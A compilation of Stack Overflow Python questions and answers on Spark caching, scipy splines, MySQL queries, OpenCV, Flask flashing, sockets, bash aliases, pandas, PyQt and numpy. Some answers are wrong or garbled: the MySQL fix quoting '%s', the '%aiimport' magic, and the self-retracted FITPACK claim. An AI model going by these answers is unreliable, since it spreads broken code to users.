## CPU times: user 12 ms, sys: 0 ns, total: 12 ms
## Wall time: 114 ms
## 50
rdd.unpersist() # Data unpersisted
%time rdd.count() # Results recomputed ~10s
## CPU times: user 16 ms, sys: 0 ns, total: 16 ms
## Wall time: 10.1 s
## 50
While in simple cases like this one persisting behavior is predictable in
general caching should be considered a hint not a contract. Task output may be
persisted or not depending on available resources and can be evicted from
cache without any user intervention.
|
What algorithm used in interp1d function in scipy.interpolate
Question: So i was writing a python program for my numerical course, and I had to code a
cubic spline program. So i implement the formula for cubic spline given in
books like [Numerical methods by Chapra and
canale](http://rads.stackoverflow.com/amzn/click/0073401064) and [Numerical
mathematics by chenny and
kincaid](http://rads.stackoverflow.com/amzn/click/1133103715).
so my data is
x=[1.0,3.0,4.0,7.0]
y=[1.5,4.5,9.0,25.5]
Using this data and applying cubic spline I get for `x=1.5` ,
`y=1.79122340426`
While using this same data but using the scipy function gives:
>>> scipy.interpolate.interp1d(x, y, kind='cubic')(1.5)
array(1.265624999999932)
So, why is that difference in result? It is obvious that they are not using
the same formula. What is the cubic spline formula used in that scipy
function? Is it a natural cubic spline formula or something improved? Note:
The value 1.2656 is more acurate.
Answer: EDIT: @ev-br in the comments for this answer provided an important correction
to my answer. In fact interp1D spline is not FITPACK based. Check the comments
for the link provided by @ev-br.
The Scipy functions for curve fitting are based on FITPACK. Try seeing the
documentation on the functions you are using and you'll be able to see a
"References" chapter where something like this will appear:
Notes
-----
See splev for evaluation of the spline and its derivatives. Uses the
FORTRAN routine curfit from FITPACK.
If provided, knots `t` must satisfy the Schoenberg-Whitney conditions,
i.e., there must be a subset of data points ``x[j]`` such that
``t[j] < x[j] < t[j+k+1]``, for ``j=0, 1,...,n-k-2``.
References
----------
Based on algorithms described in [1]_, [2]_, [3]_, and [4]_:
.. [1] P. Dierckx, "An algorithm for smoothing, differentiation and
integration of experimental data using spline functions",
J.Comp.Appl.Maths 1 (1975) 165-184.
.. [2] P. Dierckx, "A fast algorithm for smoothing data on a rectangular
grid while using spline functions", SIAM J.Numer.Anal. 19 (1982)
1286-1304.
.. [3] P. Dierckx, "An improved algorithm for curve fitting with spline
functions", report tw54, Dept. Computer Science,K.U. Leuven, 1981.
.. [4] P. Dierckx, "Curve and surface fitting with splines", Monographs on
Numerical Analysis, Oxford University Press, 1993.
These references in particular where taken from the source of
[fitpack.py](https://github.com/scipy/scipy/blob/master/scipy/interpolate/fitpack.py)
on the function "splrep". If you need to do a very thorough comparison between
your algorithm and the spline from interp1D just go to the docs:
[scipy.interpolate.interp1d](http://docs.scipy.org/doc/scipy-0.16.0/reference/generated/scipy.interpolate.interp1d.html#scipy-
interpolate-interp1d)
And you'll see a link called
[[source]](https://github.com/scipy/scipy/blob/v0.16.1/scipy/interpolate/interpolate.py#L306)
right after the definition of the name of the function (so:
scipy.interpolate.interp1D [source]). Remember that there's a lot of routine
handlers on these functions so be patient while navigating the source.
|
Having issues with using mysql SELECT in a function
Question: Started learning mySQL and got stuck on why this command is not working. I had
success with UPDATE commands and SELECT * outside the function so I am guess I
am making a mistake in calling the function or perhaps the %s needs to be
different... My google foo did not find anything so I hope you all can help
me!
Thank you so much for looking!
CODE:
def CheckBalance(UserName, BetAmount): #checks to make sure they can afford the bet. Returns 0 for no 1 for yes
import mysql.connector
cnx = mysql.connector.connect(user='root', password='Password',
host='127.0.0.1',
database='crapsdatabase')
c = cnx.cursor()
BankRoll = c.execute("SELECT PlayerBank FROM player WHERE PlayerName = %s", UserName)
if(BankRoll < BetAmount) or (BetAmount < 0):
c.close()
return 0
if(BankRoll >= BetAmount):
c.close()
return 1
From our main program I import the UpdateDatabase and call it
from plugins.database.UpdateDatabase import UpdateBets
a = UpdateBets.CheckBalance("bob", 100)
print(a)
This gives the following error:
C:\python\python.exe C:/Users/Ray/Desktop/bot/plugins/CRAPS/CrapsUpdated.py
Traceback (most recent call last):
File "C:/Users/Ray/Desktop/bot/plugins/CRAPS/CrapsUpdated.py", line 3, in <module>
a = UpdateBets.CheckBalance("bob", 100)
File "C:\Users\Ray\Desktop\bot\plugins\database\UpdateDatabase.py", line 16, in CheckBalance
BankRoll = c.execute("SELECT PlayerBank FROM player WHERE PlayerName = %s", UserName)
File "C:\python\lib\site-packages\mysql\connector\cursor.py", line 515, in execute
self._handle_result(self._connection.cmd_query(stmt))
File "C:\python\lib\site-packages\mysql\connector\connection.py", line 488, in cmd_query
result = self._handle_result(self._send_cmd(ServerCmd.QUERY, query))
File "C:\python\lib\site-packages\mysql\connector\connection.py", line 395, in _handle_result raise errors.get_exception(packet)
mysql.connector.errors.ProgrammingError: 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%s' at line 1
Answer: You should escape string literal in the query with apostrophes, so it should
be like this:
c.execute("SELECT PlayerBank FROM player WHERE PlayerName = '%s'", UserName)
|
Detecting faces from camera using Opencv Python
Question: I am currently trying to detect face from my laptop camera but for some reason
the code I found is not giving a result. The code is starting the webcam and
not giving any errors but no rectangles are drawn for the faces. No faces are
being detected hence the for loop is never running, I tried changing the scale
factor but that did not help. Both the xml files are in the same folder as the
code. The code is as following:
import numpy as np
import cv2
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')
img = cv2.VideoCapture(0)
while(1):
_,f=img.read()
gray = cv2.cvtColor(f, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x,y,w,h) in faces:
cv2.rectangle(f,(x,y),(x+w,y+h),(255,0,0),2)
roi_gray = gray[y:y+h, x:x+w]
roi_color = f[y:y+h, x:x+w]
eyes = eye_cascade.detectMultiScale(roi_gray)
for (ex,ey,ew,eh) in eyes:
cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)
cv2.imshow('img',f)
if cv2.waitKey(25) == 27:
break
cv2.destroyAllWindows()
img.release()
Answer: Hello your program work fine, You have 2 small problems one you need Tab this
code to put inside the while:
cv2.imshow('img',f)
if cv2.waitKey(25) == 27:
break
And be sure the your xml files are founded this is my code:
import numpy as np
import cv2
face_cascade = cv2.CascadeClassifier('/usr/local/Cellar/opencv3/3.0.0/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('/usr/local/Cellar/opencv3/3.0.0/share/OpenCV/haarcascades/haarcascade_eye.xml')
img = cv2.VideoCapture(0)
while(1):
_,f=img.read()
gray = cv2.cvtColor(f, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x,y,w,h) in faces:
cv2.rectangle(f,(x,y),(x+w,y+h),(255,0,0),2)
roi_gray = gray[y:y+h, x:x+w]
roi_color = f[y:y+h, x:x+w]
eyes = eye_cascade.detectMultiScale(roi_gray)
for (ex,ey,ew,eh) in eyes:
cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)
cv2.imshow('Test',f)
if cv2.waitKey(25) == 27:
break
cv2.destroyAllWindows()
img.release()
|
Running a function in each iteration of a loop as a new process in python
Question: I have this:
from multiprocessing import Pool
pool = Pool(processes=4)
def createResults(uniqPath):
*(there is some code here that populates a list - among other things)*
for uniqPath in uniqPaths:
pool.map(createResults, uniqPath)
pool.close()
pool.join()
I don't know if it's possible, but can I run the createResults function that
gets called in that loop as a new process for each iteration?
I'm populating a list using a 4 million line file and it's taking 24+ hours to
run. (Obviously the code above does not work)
Thanks!
Answer: Instead of:
for uniqPath in uniqPaths:
pool.map(createResults, uniqPath)
Do this:
pool.map(createResults, uniqPaths)
You must use map on the iterable itself in order to run in a concurrent
fashion.
Keep in mind though - Populating a list means the list won't be shared between
the processes, and if it does using
[`Array()`](https://docs.python.org/3.5/library/multiprocessing.html#multiprocessing.Array),
make sure it's process-safe.
|
How to connect() with a non-blocking socket?
Question: In Python, I would like to use `socket.connect()` on a socket that I have set
to non-blocking. When I try to do this, the method always throws a
`BlockingIOError`. When I ignore the error (as below) the program executes as
expected. When I set the socket to non-blocking after it is connected, there
are no errors. When I use select.select() to ensure the socket is readable or
writable, I still get the error.
**testserver.py**
import socket
import select
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(0)
host = socket.gethostname()
port = 1234
sock.bind((host, port))
sock.listen(5)
while True:
select.select([sock], [], [])
con, addr = sock.accept()
message = con.recv(1024).decode('UTF-8')
print(message)
**testclient.py**
import socket
import select
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(0)
host = socket.gethostname()
port = 1234
try:
sock.connect((host, port))
except BlockingIOError as e:
print("BlockingIOError")
msg = "--> From the client\n"
select.select([], [sock], [])
if sock.send(bytes(msg, 'UTF-8')) == len(msg):
print("sent ", repr(msg), " successfully.")
sock.close()
**terminal 1**
$ python testserver.py
--> From the client
**terminal 2**
$ python testclient.py
BlockingIOError
sent '--> From the client\n' successfully.
This code works correctly except for the BlockingIOError on the first
connect(). The documentation for the error reads like this: `Raised when an
operation would block on an object (e.g. socket) set for non-blocking
operation.`
**How do I properly connect() with a socket set to non-blocking? Can I make
connect() non-blocking? Or is it appropriate to just ignore the error?**
Answer: The trick here is that when the select completes the first time, _then_ you
need to call `sock.connect` again. ~~The socket is not connected until you
have received a successful return status from`connect`.~~
Just add these two lines _after_ the first call to `select` completes:
print("first select completed")
sock.connect((host, port))
EDIT:
Followup. I was wrong to have stated that an additional call to `sock.connect`
is required. It is however a good way to discover whether the original non-
blocking call to `connect` succeeded if you wish to handle the connection
failure in its own code path.
The traditional way of achieving this in C code is explained here: [Async
connect and disconnect with epoll
(Linux)](http://stackoverflow.com/questions/10187347/async-connect-and-
disconnect-with-epoll-linux/10194883#10194883)
This involves calling `getsockopt`. You can do this in python too but the
result you get back from `sock.getsockopt` is a `bytes` object. And if it
represents a failure, you then need to convert it into an integer `errno`
value and map that to a string (or exception or whatever you require to
communicate the issue to the outside world). Calling `sock.connect` again maps
the `errno` value to an appropriate exception already.
Solution 2: You can also simply defer calling `sock.setblocking(0)` until
_after_ the connect has completed.
|
Python - flask - understanding behaviour of routing / flash()
Question: I'm new to this. I can't understand why the app doesn't seem to be able to
keep hold of data that was randomly generated. get_question() returns a dict
with 2 key:value pairs. The question/answer are randomly generated from this
function. Every time flash() is called does it rerun all of the code inside
index()? When the flashed messages appear, the user's answer correlates to
what was typed in, but the question and correct answer seem to appear at
random - suggesting that the whole of index() is recalled every time submit is
clicked. How do I prevent that from happening? Should I be using 'session'?
UPDATE: To be more specific - I can't understand why the flashed messages are
completely unrelated to what is rendered in the browser. It seems as though
flash() is running its own call to my get_question() function and as a result
is getting different questions/answers to the ones shown?
[Here are some images that show the
problem](http://i.stack.imgur.com/fe2yT.png)
@app.route('/', methods=['GET', 'POST'])
@app.route('/index', methods=['GET', 'POST'])
def index():
user = {'nickname': 'test'} # fake user
question = question_gen.get_question()
answer = AnswerQuestionForm()
q = question['question']
correct = question['answer']
response = ""
if answer.validate_on_submit():
you_said = request.form['answer']
print("You said {}, to the question {}. correct was {}".format(you_said, q, correct))
flash("The question was: %s" % q)
flash("The correct answer was: %s" % correct)
flash("You said: %s" % you_said)
return redirect(url_for('index'))
return render_template('index.html',
title='Home',
user=user,
question=question,
answer=answer,
response=response)
Answer: Think of `flash` like a filing cabinet. When you run the `flash('message')`
command all it does it store that message in the cabinet. If your templates
aren't actively looking in the cabinet for messages and taking them out,
they'll just keep building up. Sometimes that is confusing if you're not
immediately grabbing them on the next page, because when you do finally check
for them, the feedback that was generated at that point is now shown when it's
not longer useful (and likely is now confusing).
So if we assume a simple app like:
from flask import Flask, flash, render_template
from datetime import datetime
app = Flask(__name__)
app.secret_key = 'SO'
@app.route('/')
def store():
flash('Stored at {}'.format(datetime.now()))
return 'Reload to store another message!'
@app.route('/contents/')
def contents():
return render_template('contents.html')
if __name__ == '__main__':
app.run(debug=True)
With the contents of `contents.html` being:
<!doctype html>
<title>Messages</title>
{% with messages = get_flashed_messages() %}
{% if messages %}
<ul class=flashes>
{% for message in messages %}
<li>{{ message }}</li>
{% endfor %}
</ul>
{% endif %}
{% endwith %}
If I go to `/` ten times, then load up `/contents/` It'll render my
`contents.html` template and display any waiting messages, essentially the
template code is going "Open the filing cabinet and pull out and display each
stored message, then throw it away". Generally the template code above is
included on **every** page template, so the flashed feedback is immediate and
doesn't build up.
**Update**
If you look at your program flow, the first time a user accesses the page
without a form submission, the following happens:
1. Get random question
2. Render the `index.html` template using the random question
When a user fills in the answer and submits the form, the following happens:
1. Get a new random question
2. Pull the `answer` field from the form
3. Print the `answer` field from the form, the new randomly generated `question` and the new randomly generated `answer`.
4. Flash the same information
5. Redirect the user to the `index` view
At this point, nothing's been shown to the user, the (incorrect) flashed
messages are already in the cabinet, but we're not finished because of the
redirect:
6. Get another random question
7. Render the `index` template using the random question
What you're missing is the ability to look up an existing question, when the
form is submitted you need some logic to say "get me the question that matches
this submitted form entry so I can check the answer is correct".
Usually that's done with a `id` key `question = {id: 1, question: "1+1",
answer: "2"}` Then you could store that `id` as a hidden field in your form
and adjust your `get_question` to optionally take an `id` argument so it can
look through your list of questions to find the correct one.
|
Alias to Launch Python .py Script
Question: I am trying to create an Alias to launch mystepper6.py and moveit.py and sudo
ps ax by placing the following alias' in sudo nano ~/.bashrc (Note: I am using
Python 2 for this script.)
reboot='sudo reboot'
ax='sudo ps ax'
runstepper='python home/pi/mystepper6.py'
moveit='sudo python home/pi/moveit.py'
The alias reboot works fine but none of the others work at all. All I get is
"bash: runstepper: command not found".
I am doing this because I am trying to control my webcam on my Raspberry Pi 2
using my iPhone with the iFreeRDP app. I use remote desktop connection from my
Windows 10 laptop. The problem with this app and some other similar apps, is
that the period and space keys do not function (it is a know reported issue).
This makes typing full commands impossible.
Incidentally, I tried to use the VNC Viewer iPhone app and got my Raspberry Pi
2 hijacked when I loaded the required software onto the RPi2 requiring me to
get a new SD card. Fortunately, I just cloned my SD card a few hours prior.
Long story, but I am very weary about using VNC Viewer now.
Please help me with my alias' so I can either type one word with no spaces or
periods or create a desktop short cut that I can double click so I can use it
as a workaround for the deficiencies of these otherwise good apps. I am not
sure the Ctrl + C works on the app keyboards either, so a short cut for that
would be good as well.
Answer: to create aliases in your shell, you shall use the
[`alias`](http://ss64.com/bash/alias.html) shell directive:
alias reboot='sudo reboot'
alias ax='sudo ps ax'
To run `ps ax` you do not need to `sudo` first. If you're running a standard
kernel, any user can see the list of all processes without special privileges.
For the two python aliases:
alias runstepper='python home/pi/mystepper6.py'
alias moveit='sudo python home/pi/moveit.py'
^-- missing / here
do not forget about the first `/` in the path, or whenever you launch the
aliased command, you'll have python look up for the script relatively to the
current directory. i.e. if you're in `/home/pi`, it will look it up into
`/home/pi/home/pi/movestepper6.py` and tell you the script does not exists. So
the proper command should be:
alias runstepper='python /home/pi/mystepper6.py'
alias moveit='sudo python /home/pi/moveit.py'
* * *
Though as a suggestion to you, instead of making aliases to run python
scripts, I'd make them into a proper python package. Considering that within
both codes your entry points are a function called `main()`, i.e., both
scripts end with:
if __name__ == "__main__":
main()
you should create a directory for your project:
cd /home/pi
# create a directory for your python project:
mkdir motion_control
# create a directory to place your scripts within:
mkdir motion_control/motion_control
# adding an empty __init__.py file makes that directory a python package
touch motion_control/motion_control/__init__.py
nano motion_control/setup.py
and now you just have to add this within the setup.py file:
from setuptools import setup
setup(name='motion_control',
version='0.1',
description="Python library to operate stuff that move on my rasppi",
long_description='explain how to use the tools installed by this package',
classifiers=[],
keywords='raspberrypi motion control',
author='YOU',
author_email='YOUR@EMAIL',
url='ANY URL YOU THINK IS RELEVANT',
license='MIT', # or any license you think is relevant
packages=['motion_control'],
zip_safe=False,
install_requires=[
# add here any tool that you need to install via pip
# to have this package working
'setuptools',
],
entry_points="""
# -*- Entry points: -*-
[console_scripts]
runstepper = motion_control.mystepper6:main
moveit = motion_control.moveit:main
""",
)
the `entry_points` part is very important, as it's telling python where to
look for the first function to execute to have the script run. For example:
moveit = motion_control.moveit:main
means "look for the main() function within the moveit module in the
motion_control package". So adapt accordingly! As a note: don't make that
`main()` function take any parameter, but rather do the argument parsing
within it (if you parses arguments).
and finally, to install it, all you need to do is:
cd motion_control
sudo python setup.py install
and you'll have `runstepper` and `moveit` installed in the same directory as
your python executable.
HTH
|
Why am I getting a "None" in my Python code?
Question: I'm trying to loop through six Wikipedia pages to get a list of every song
linked. It gives me this error when I run it in Terminal:
Traceback (most recent call last):
File "scrapeproject.py", line 31, in <module>
print (getTableLinks(my_url))
File "scrapeproject.py", line 20, in getTableLinks
html = urlopen(my_url)
File "/Users/adriana/Software/Python-3.5.1/mybuild/lib/python3.5/urllib/request.py", line 162, in urlopen
return opener.open(url, data, timeout)
File "/Users/adriana/Software/Python-3.5.1/mybuild/lib/python3.5/urllib/request.py", line 456, in open
req.timeout = timeout
AttributeError: 'NoneType' object has no attribute 'timeout'
I think this is because a None keeps showing up when I print the song list.
Anyone have any suggestions?
**Code:**
from urllib.request import urlopen
from bs4 import BeautifulSoup
import sys
import http.client
main = "https://en.wikipedia.org/wiki/Billboard_Year-End_Hot_100_singles_of_"
year = 2009
def createUrl(main, year):
for i in range(0, 6): # increment years so i can get each link
year += 1
print ("\n\n", year, "\n\n")
fullUrl = main + str(year)
return fullUrl
my_url = createUrl(main, year) # this is how i make createUrl a variable to be used in other functions
def getTableLinks(my_url): # there is a random none appearing in my code
# i think the problem is between here...
html = urlopen(my_url)
bsObj = BeautifulSoup(html.read(), "html.parser")
tabledata = bsObj.find("table", {"class":"wikitable"}).find_all("tr")
# ...and here
for table in tabledata:
try:
links = table.find("a")
if 'href' in links.attrs:
print (links.attrs['href'])
except:
pass
print (getTableLinks(my_url))
Answer: You're not returning anything from `createUrl` so None gets returned instead
If you want to create a batch of six urls to go to and then parse for data /
do web scraping with.. I'd suggest appending them to a list or mapping each
url to the function for parsing procedurally and then either doing that or
return the list and iterating through it for parsing.
|
How to access upper left cell of a pandas dataframe?
Question: Here is my Python's Pandas dataframe. How can I access the upper left cell
where `"gender"` is in and change the text? `"gender"` is not in
`names.columns`. So I thought this might be `names.index.name` but that was
not it.
import pandas as pd
names = pd.DataFrame({'births': {0: 7065, 1: 2604, 2: 2003, 3: 1939, 4: 1746},
'gender': {0: 'F', 1: 'M', 2: 'F', 3: 'M', 4: 'F'},
'name': {0: 'mary', 1: 'anna', 2: 'emma', 3: 'elizabeth', 4: 'minnie'},
'year': {0: 1880, 1: 1880, 2: 1880, 3: 1880, 4: 1880}})
names = names.pivot_table(index=['name', 'year'], columns='gender', values='births').reset_index()
[](http://i.stack.imgur.com/oUtWw.jpg)
Answer: `gender` is the name of the columns index:
In [16]:
names.columns.name = 'something'
names
Out[16]:
something name year F M
0 anna 1880 NaN 2604
1 elizabeth 1880 NaN 1939
2 emma 1880 2003 NaN
3 mary 1880 7065 NaN
4 minnie 1880 1746 NaN
You can see this when you look at the `.columns` object:
In [18]:
names.columns
Out[18]:
Index(['name', 'year', 'F', 'M'], dtype='object', name='gender')
I guess it does confusingly look like the index from the output
|
Qt Designer promoted widget layout
Question: I am using Qt Designer for designing my user interfaces, and I want to build
custom widgets which could be a combination of existing qt widgets such as a
QLabel and QPushButton attached screenshot
[](http://i.stack.imgur.com/flgxH.png).
Now I would like this to be independent with it's own business logic, signals
and slots in a separate python file, but would want to add this as a component
to my main screen.
I tried above by creating seprate ui file of type widget, but when I promote
that from my MainWindow, it won't show up, and the code generated by pyuic
would add it to the layout, but it is not rendered in main window.
[](http://i.stack.imgur.com/jklDD.png)
Is there a way of doing that in PyQt and QDesigner?
**EDIT** :
Here is the actual code:
_timer.py_ :
from PyQt4 import QtGui, QtCore
from datetime import timedelta, datetime
from logbook import info
import timer_ui
class Timer(QtGui.QWidget, timer_ui.Ui_TimerWidget):
start_time = None
running = False
total_time = 0
time_spent = ''
activity = None
stopwatch = 0
elapsed_time = None
total_elapsed_time = timedelta()
def __init__(self, parent=None):
super(self.__class__, self).__init__(parent)
self.setupUi(parent) #for custom widget parent is main window here which is dashboard
self.lcdNumber.setDigitCount(12)
self.qt_timer = QtCore.QTimer(self)
self.qt_timer.timeout.connect(self.timer_event)
self.qt_timer.start(1000)
self.goButton.clicked.connect(self.go)
self.breakButton.clicked.connect(self.break_timer)
def go(self):
# date text format .strftime('%a, %d %b %Y %H:%M:%S')
self.start_time = datetime.now().replace(microsecond=0)
self.running = True
self.goButton.setEnabled(False)
self.breakButton.setEnabled(True)
def break_timer(self):
''' break finishes the activity '''
break_time = datetime.now().replace(microsecond=0)
self.activity.log_break(break_time.isoformat())
self.activity = None # activity completed
self.total_elapsed_time += self.elapsed_time
info(self.total_elapsed_time)
self.running = False
# self.lcdNumber.display(str(self.timer.get_elapsed()))
self.goButton.setEnabled(True)
self.breakButton.setEnabled(False)
def timer_event(self):
'''Updates the widget every second'''
if self.running == True:
current_time = datetime.now().replace(microsecond=0)
# if self.elapsed_time is None:
self.elapsed_time = current_time - self.start_time
# else:
#self.elapsed_time += current_time - self.timer.start_time.replace(microsecond=0)
if self.total_elapsed_time is not None:
self.lcdNumber.display(str(self.elapsed_time + self.total_elapsed_time))
else:
self.lcdNumber.display(str(self.elapsed_time))
_mainwindow.py_ :
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'dashboard.ui'
#
# Created: Sat Mar 19 11:40:35 2016
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(772, 421)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.verticalLayout = QtGui.QVBoxLayout()
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.widget = Timer(self.centralwidget)
self.verticalLayout.addWidget(self.widget)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.userNameLabel = QtGui.QLabel(self.centralwidget)
self.userNameLabel.setObjectName(_fromUtf8("userNameLabel"))
self.horizontalLayout.addWidget(self.userNameLabel)
self.logoutButton = QtGui.QPushButton(self.centralwidget)
self.logoutButton.setEnabled(True)
self.logoutButton.setObjectName(_fromUtf8("logoutButton"))
self.horizontalLayout.addWidget(self.logoutButton)
self.verticalLayout.addLayout(self.horizontalLayout)
self.listView = QtGui.QListView(self.centralwidget)
self.listView.setObjectName(_fromUtf8("listView"))
self.verticalLayout.addWidget(self.listView)
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.menuBar = QtGui.QMenuBar(MainWindow)
self.menuBar.setGeometry(QtCore.QRect(0, 0, 772, 23))
self.menuBar.setObjectName(_fromUtf8("menuBar"))
MainWindow.setMenuBar(self.menuBar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "Title", None))
self.userNameLabel.setText(_translate("MainWindow", "You are now logged in as", None))
self.logoutButton.setText(_translate("MainWindow", "Logout", None))
from timer import Timer
_timer_ui.py_ :
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'timer.ui'
#
# Created: Sat Mar 19 11:41:40 2016
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_TimerWidget(object):
def setupUi(self, TimerWidget):
TimerWidget.setObjectName(_fromUtf8("TimerWidget"))
TimerWidget.resize(412, 52)
self.horizontalLayout = QtGui.QHBoxLayout(TimerWidget)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.label = QtGui.QLabel(TimerWidget)
self.label.setObjectName(_fromUtf8("label"))
self.horizontalLayout.addWidget(self.label)
self.lcdNumber = QtGui.QLCDNumber(TimerWidget)
self.lcdNumber.setAutoFillBackground(False)
self.lcdNumber.setNumDigits(12)
self.lcdNumber.setSegmentStyle(QtGui.QLCDNumber.Flat)
self.lcdNumber.setObjectName(_fromUtf8("lcdNumber"))
self.horizontalLayout.addWidget(self.lcdNumber)
self.goButton = QtGui.QPushButton(TimerWidget)
self.goButton.setObjectName(_fromUtf8("goButton"))
self.horizontalLayout.addWidget(self.goButton)
self.breakButton = QtGui.QPushButton(TimerWidget)
self.breakButton.setObjectName(_fromUtf8("breakButton"))
self.horizontalLayout.addWidget(self.breakButton)
self.retranslateUi(TimerWidget)
#QtCore.QMetaObject.connectSlotsByName(TimerWidget)
def retranslateUi(self, TimerWidget):
#TimerWidget.setWindowTitle(_translate("TimerWidget", "Form", None))
self.label.setText(_translate("TimerWidget", "Total hours spent", None))
self.goButton.setText(_translate("TimerWidget", "Go!", None))
self.breakButton.setText(_translate("TimerWidget", "Break", None))
Answer: Promoted widgets are just placeholders for standard Qt widgets. You cannot
create a custom widget for Qt Designer that way.
It can be done, but the process is much more complicated than simple widget
promotion. See [Writing Qt Designer
Plugins](http://pyqt.sourceforge.net/Docs/PyQt4/designer.html#writing-qt-
designer-plugins) in the PyQt docs, and for a detailed tutorial, see [Using
Python Custom Widgets In Qt
Designer](http://wiki.python.org/moin/PyQt/Using_Python_Custom_Widgets_in_Qt_Designer)
on the Python Wiki. The [PyQt source
code](http://www.riverbankcomputing.com/software/pyqt/download) also has many
more examples (look in _examples/designer/plugins_).
**EDIT** :
There are two problems with your code. Firstly, you are passing the wrong
argument to `setupUi` in the `Timer` class. You should fix it like this:
class Timer(QtGui.QWidget, timer_ui.Ui_TimerWidget):
...
def __init__(self, parent=None):
super(Timer, self).__init__(parent)
self.setupUi(self) # pass in self, not parent
Secondly, you edited the _mainwindow.py_ file and broke one of the layouts.
Never, **_ever_** edit the modules generated by `pyuic`! The line you broke is
this one:
# self.verticalLayout = QtGui.QVBoxLayout()
self.verticalLayout = QtGui.QVBoxLayout(self.centralwidget)
But don't try to fix this by editing - instead, make sure you _regenerate_ all
the ui modules with `pyuic` so you get back to clean, unedited files again.
|
How to force an automatic reload of the library from inside IPython notebook
Question: I'm just learning IPython Notebook, using a pre-existing Python library I've
written. At the beginning of my notebook, I'm importing it in the normal way.
However, I'm still modifying this library. I notice that changes I'm making to
it don't seem to be reflected, even when I reload the notebook in the browser.
How can I force a reload of the library from inside IPython notebook?
Answer: Use the magic
[`autoreload`](http://ipython.readthedocs.org/en/stable/config/extensions/autoreload.html?#module-
IPython.extensions.autoreload) to get your module refreshed automatically as
you edit it.
For instance, if you develop a module called `mylibrary`:
%load_ext autoreload
%autoreload 1
%aiimport mylibrary
will automatically reload the module `mylibrary`.
You can ask to get all modules automatically reloaded with:
%autoreload 2
|
Different results for linalg.norm in numpy
Question: I am trying to create a feature matrix based on certain features and then
finding distance b/w the items. For testing purpose I am using only 2 points
right now.
data : list of items I have
specs : feature dict of the items (I am using their values of keys as features
of item)
features : list of features
This is my code by using numpy zero matrix :
import numpy as np
matrix = np.zeros((len(data),len(features)),dtype=bool)
for dataindex,item in enumerate(data):
if dataindex > 5:
break
specs = item['specs']
values = [value.lower() for value in specs.values()]
for idx,feature in enumerate(features):
if(feature in values):
matrix[dataindex,idx] = 1
print dataindex,idx
v1 = matrix[0]
v2 = matrix[1]
# print v1.shape
diff = v2 - v1
dist = np.linalg.norm(diff)
print dist
The value for dist I am getting is 1.0
This is my code by using python lists :
matrix = []
for dataindex,item in enumerate(data):
if dataindex > 5:
f = open("Matrix.txt",'w')
f.write(str(matrix))
f.close()
break
print "Item" + str(dataindex)
row = []
specs = item['specs']
values = [value.lower() for value in specs.values()]
for idx,feature in enumerate(features):
if(feature in values):
print dataindex,idx
row.append(1)
else:
row.append(0)
matrix.append(row)
v1 = np.array(matrix[0]);
v2 = np.array(matrix[1]);
diff = v2 - v1
print diff
dist = np.linalg.norm(diff)
print dist
The value of dist in this case is 4.35889894354
I have checked many time that the value 1 is being set at the same position in
both cases but the answer is different.
May be I am not using numpy properly or there is an issue with the logic. I am
using numpy zero based matrix because of its memory efficiency.
What is the issue?
Answer: It's a type issue :
In [9]: norm(ones(3).astype(bool))
Out[9]: 1.0
In [10]: norm(ones(3).astype(float))
Out[10]: 1.7320508075688772
You must decide what it the good norm for your problem and eventually cast
your data with `astype`.
[`norm(M)`](http://docs.scipy.org/doc/numpy-1.10.0/reference/generated/numpy.linalg.norm.html)
is `sqrt(dot(M.ravel(),M.ravel()))` , so for a boolean matrix, `norm(M)` is 0.
if `M` is the `False` matrix, 1\. otherwise. use the `ord` parameter of `norm`
to tune the function.
|
Python: Is it meaningful to import sub-package?
Question: This statement is from [Python 3
Doc](https://docs.python.org/3/tutorial/modules.html):
> Note that when using from package import item, the item can be either a
> submodule (or subpackage) of the package ...
It says we can `from package import subpackage`.
Here I create a package `audio`, and two subpackage `format` and `sound`.
[](http://i.stack.imgur.com/JCNLm.png)
Then I import its subpackage :
from audio import sound
print(type(sound))
The output is
